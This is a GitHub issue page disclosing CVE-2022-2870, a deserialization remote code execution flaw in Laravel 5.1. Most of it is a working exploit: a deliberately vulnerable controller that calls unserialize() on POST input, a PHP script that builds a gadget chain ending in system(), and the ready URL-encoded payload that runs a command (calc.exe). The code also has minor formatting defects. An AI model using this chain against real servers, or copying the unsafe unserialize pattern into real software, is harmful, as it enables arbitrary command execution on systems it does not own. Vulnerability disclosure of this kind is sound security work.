Headline
CVE-2022-2870: Laravel5.1 Unserialize RCE · Issue #2 · beicheng-maker/vulns
A vulnerability was found in laravel 5.1 and classified as problematic. This issue affects some unknown processing. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206501 was assigned to this vulnerability.
Laravel 5.1 POP Chain
composer create-project --prefer-dist laravel/laravel laravel5.1 “5.1.*”
app/Http/Controllers/UsersController.php adding a controller UsersController
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller {
/\*\*
\* 创建一个新用户。
\*
\* @param Request $request
\* @return Response
\*/
public function store(Request $request)
{
echo "Please post cmd to unserialize";
$payload\=$request\->input("cmd");
unserialize($payload);
//
}
} ?>
routes/web.php
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
<?php use Illuminate\Support\Facades\Route; /* |--------------------------------------------------------------------------
| Web Routes |
|---|
| Here is where you can register web routes for your application. These |
| routes are loaded by the RouteServiceProvider within a group which |
| contains the “web” middleware group. Now create something great! |
*/
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
EXP
<?php
namespace Illuminate\Auth; class RequestGuard{ protected $provider; protected $callback; protected $request; public function __construct(){ $this->callback = 'call_user_func’; $this->request = 'system’; $this->provider = 'calc’; } }
namespace Illuminate\View; use Illuminate\Auth\RequestGuard; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new RequestGuard,’user’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>
O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D